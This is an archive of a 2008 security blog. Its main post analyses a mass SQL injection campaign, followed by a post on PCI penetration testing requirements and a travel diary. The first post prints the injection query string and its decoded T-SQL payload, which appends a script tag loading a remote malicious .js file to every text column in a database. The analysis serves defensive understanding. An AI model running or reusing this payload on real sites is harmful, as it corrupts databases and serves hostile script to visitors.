Archive for April, 2008

Scary Mass-SQL Attack…

April 30, 2008

With well over half a million websites compromised, if you have not already heard about the live mass SQL exploit, get reading. This is real, this is clever, and it is scary. This is attack is creative to the tune of rain forest puppy and resourceful like Johnny Long. This attack is basically using SQL Injection to embed a XSS attack.

Note- I’m about a month behind the 8-Ball here, this was published in mid March.

This brings to light the importance of including Google Hacking as part of your penetration testing and corporate due diligence. Googledorks beware- if Google has cached any form of database error messages on your sites, you’re only inviting trouble.

This attack is the largest scale attack using SQL injection I have heard of. Some of the earliest work on SQL injection may have been published by rfp back in 1998. We all know SQL injection has been in the news, has the attention of the payment card brands, and may have found its way into corporate executive vocabulary (if not led or followed by an explicative from time to time).

Exploit Summary as summarized by WhiteHat’s Mitchell Poortinga

This is a SQL Injection vulnerability found in ASP that used a query string as the SQL query – attackers run “scripted” attacks. (in this case, bots) This SQL attack injects a link to a .js file into text fields in the database. When the application calls for a database field, the malicious javascript executes cross site scripting.
Attack profile

* Two initial query strings that do some basic injection, apparently as a test.
* One or more additional queries, specifically to do IS_SRVROLEMEMBER() happen in some cases.
* Two final queries that DECLARE a variable that CASTs a large hex value into NVARCHAR and then EXEC()’s that string. The string contains a script to append the link to the .js file onto every string-type column in every table in the database.
* All of these happen within a very short period of time. The only lag seems to be the time it takes the final two queries to execute. (In the case with the largest database, the last query actually failed with a timeout. I guess that’s not surprising since it’s essentially doing a find-and-replace on the entire database table.)

example:
id=z;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300…7200%20AS%20NVARCHAR(4000));EXEC(@S);–

which means:
DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x440045004300…7200 AS NVARCHAR(4000));
EXEC(@S);–

… = a few hundred chars that were not included (hex encoded values)

So, here’s what this little bit of T-SQL is doing:

1. Declaring a variable, S, as an NVARCHAR.
2. Taking a long hex value that is really a Unicode string(1) and casting it as NVARCHAR. In other words, we’re taking this hex representation of a string and turning it into a real string.
3. Once that’s done, we execute that string as a T-SQL statement.

The Wikipedia definition of T-SQL, “Transact-SQL (T-SQL) is Microsoft’s and Sybase’s proprietary extension to the SQL language. Microsoft’s implementation ships in the Microsoft SQL Server product. Sybase uses the language in its Adaptive Server Enterprise, the successor to Sybase SQL Server.”

Microsoft defines a NVARCHAR as a, “Variable-length Unicode character data. n can be a value from 1 through 4,000.”

Here is the CAST string decoded:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec(‘update [‘+@T+’] set [‘+@C+’]=rtrim(convert(varchar,[‘+@C+’]))+”<script src=http://www.211796*.net/f****p.js></script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

The majority of this information is from Neil Carpenter’s an anatomical description of the SQL incident here.

McAfee Avert Labs has an overview here.

PCI Requirement 11.3.2 – Penetration Testing

April 28, 2008

Tod raised a question in response to the PCI 6.6 Information Supplement Released post, a question heard by many QSAs (and several other email responses to that post.) These concerns were echoed by Rory on his blog.

First, we need to be current with the ‘Information Supplement: Requirement 11.3 Penetration Testing‘ on the PCI SSC’s website. I will also be paraphrasing Michael Dahn’s post over at pcianswers.com, and related posts in that forum. I will compare/contrast the implications of application testing in 6.6 and penetration testing in 11.3(.2) tomorrow.

Requirement 11 is titled, “Regularly test security systems and processes,” while Requirement 11.3 states, “Peform penetration testing at least once a year, and after any significant infrastructure or application upgrade or modification…”

From the supplement, “The scope of penetration testing is the cardholder data environment and all systems and networks connected to it. If network segmentation is in place such that the cardholder data environment is isolated from other systems, and such segmentation has been verified as part of the PCI DSS assessment, the scope of the penetration test can be limited to the cardholder data environment.

Comprehensive penetration testing is intended to efficiently uncover flaws, mistakes, deviation and weakness in “secured” environments and processes. Testing should not be limited to applications and systems involved, but anything that would serve a ‘jumping off point’ (jargon- a base of operations for an attack) on the network segment where sensitive data resides. Any system, platform, or process be it technical or human driven; that is in any way involved with the data set in question (cardholder data) should be probed for weakness, and that weakness should be explored in the penetration testing exercise.

PLEASE- do not get distracted by correcting exploited vulnerabilities, focus on flawed processes or procedures that created… find the root cause.

Ever heard of ‘vulnerability whack-a-mole’? Vulnerability and Penetration testing exercises often incite the reflexive corporate ‘to-do’ response correcting the problem identified. The whole point of the exercise isn’t to find a single deficiency, but to find flaws in the process. (I’m going to skip the anecdotal reference to an ISO 9001 audit… precision in process is NOT doing what you say you will do, but doing it absolutely every time- thus a mistake in design delivers a mistake in production with 100% efficiency!!)

A flaw in any process design will systematically allow weakness, this is how security testers find vulnerabilities with a high degree of consistency. This is also how our operations team continually finds vulnerabilities in code already corrected- corrections did not get checked back into the source code tracking system.

An attacker’s apology…

Defending an information asset is very difficult, while attacking is very easy. Defenders must protect every thing absolutely, and attackers only need to find one mistake or vulnerability. This is what true penetration testing is all about.

Please understand that my job in InfoSec has always been easy. I have spent my short life studying organizations tasked with the protection of information assets. These companies teach good auditors what mistakes are often made, and how to exploit them for maximum leverage. My job was EASY in comparison of these security professionals. *IF* I was tasked with the thankless job of defending a network, I would use the annual penetration testing requirement like an annual physical, and any time something significant might need the attention of a dedicated expert.

What is a significant infrastructure or or application upgrade?
You penetration testing investment should be for truly noteworthy changes. Altering network or DMZ topology. Changing operating systems, application or database platforms, security and network device replacement, etc. Even changes to admissions or visitor registration, a new facility or perhaps opening a new data center only begs for exploration by a social engineer!

For many environments, the majority of changes would be insignificant (including most minor code updates), and security concerns should be detected through operational security due-care exercises described in PCI Requirements 2.2, 6.1, 6.3, 6.6, and others.

What exactly does penetration testing call for?

The guidance speaks to attack vectors or techniques, “Consider including all of these penetration-testing techniques (as well as others) in the methodology, such as social engineering and the exploitation of exposed vulnerabilities, access controls on key systems and files, web-facing applications, custom applications, and wireless connections.

This is what information security practitioners dream about. PCI has clearly stated that a penetration test must reach beyond the technology, and encompass business practices, physical security, and social engineering! One of peers always stated in executive reports, “if you think you can solve the security problem with technology, you clearly do not understand the problem.”

Penetration Testing goes far beyond actions required in PCI Requirement 11.2 for vulnerability scanning at the network layer (ASV or Approved Scanning Vendor services) or Requirement 6.6 for the detection and correction of vulnerabilities in custom application code- this is about exploring how deep different vulnerabilities can allow attacks to travel. This is active exploitation- not passive vulnerability detection or verification they exist.

Don’t neglect Social Engineering

The effectiveness of security controls, technology, and business processes are dwarfed by the creative genius of those humans trusted with sensitive information. You’ve seen the Think Geek t-shirt, “there is no patch for human stupidity.” I won’t admit to owning one..

Here is a very short exercise for those new to the science of social engineering:

  • Does development sanitize (remove) sensitive data (credit card numbers) from the databases they use?
    What are the odds of the help desk team walking off with a computer… or maybe out of the building?
  • Does your new-hire process carefully identify employees before issuing user credentials?
    Ever tried sneaking in with a batch of new hires?
  • Do remote offices carefully validate the identity and work orders for support personnel?
    Do remote offices disdain visits from technical support? c’mon….
  • Does the help desk carefully authenticate callers needing help for password resets?
    I hate to reference the classic Mitnick, but, well, errr- it’s classic and it still works!

Special situations require special responses. All processes have a shortcut, there is always someone with the ability skip a step or make a judgment call. Have you ever ‘donated’ your wallet while traveling? If someone else has your government issued ID, how do you get past a security checkpoint without missing your flight? Given the right circumstances, anything is possible, any obstacle can be overcome.

ahh, New York in the Spring

April 24, 2008

IT IS A BEAUTIFUL DAY IN NEW YORK, and I’m taking a long lunch to post on something NON-WORK related. I’m sitting in Bryant Park in downtown Manhattan, somewhere around 40th or 41st and 6th Ave. It’s gotta be 80 degrees Fahrenheit, I can’t see a cloud anywhere, and the there are people as far as they eye can see.

I’m winding down from a two week trip where I participated in PCI meetings at the ETA show in Las Vegas last week, took the 6am flight from LAS to DFW for a couple full days of meetings, a beautiful weekend of motorcycles in Dallas, the TRISC conference in San Antonio, and another presentation tomorrow in NYC before flying home on Saturday.

Couple anecdotes from the trip:

  • The Las Vegas security checkpoint takes an entire HOUR at 4:30 AM.
    Not a joke, you’ve been warned.
    I was flying American out of one of the ‘B’ gates. About half way through the ‘security checkpoint lemming’ experience, caffeiene kicked in and I realized that the ‘A’ gate checkpoint would allow faster passage to the ‘B’ gate. Yea, at that hour you don’t see clearly- but I probably still shaved 20 minutes off my time.. here’s a diagram showing the fork between A and B gates. Skip the B checkpoint.
  • A Harley does not ride like a Bimmer.
    Thanks to Bill and Ethan, I spent most of Saturday riding a ’00 Harley Dyna Wide-Glide. I live to ride, and own an array of two wheeled machinery, but haven’t spent time on a Harley. Good Times, but you’ve got to know that when the good Harley’s die and get to heaven, they turn into BMW Motorcycles.  Bill and I stopped by to see our buddy Gary Queen at OSC (this link is probably NSFW, Other Side Customs), he’s always doing some of the coolest projects. After hearing a couple of stories we crashed a surprise birthday party- well done guys.
  • God Bless Texas.
    I was born in Texas, but have actually only spent about 4 years living there. (read: I have my Native Texan card, but that’s about it) I’ve been working in California for almost a year. Some of my bills accumulate in San Francisco, but every trip back through reminds me- my heart is in Texas.
  • Lock Picking is EASY
    TRISC was outstanding. When you’re not hearing presentations, conferences are good for intro’s, putting some faces with names, catching up with friends, and learning some new foo. Deviant Ollam was at the conference maintaining quite the crowd with his booth based training and lock picking village, “Gringo Warrior.” Met several of the gents from the Denim Group including Dan Cornell and John Dickson, very cool guys. It is always a pleasure catching up with the talented Robert Hansen.

Enough about non-work related actions, I owe Tod a post on PCI 11.3.2 vs 6.6…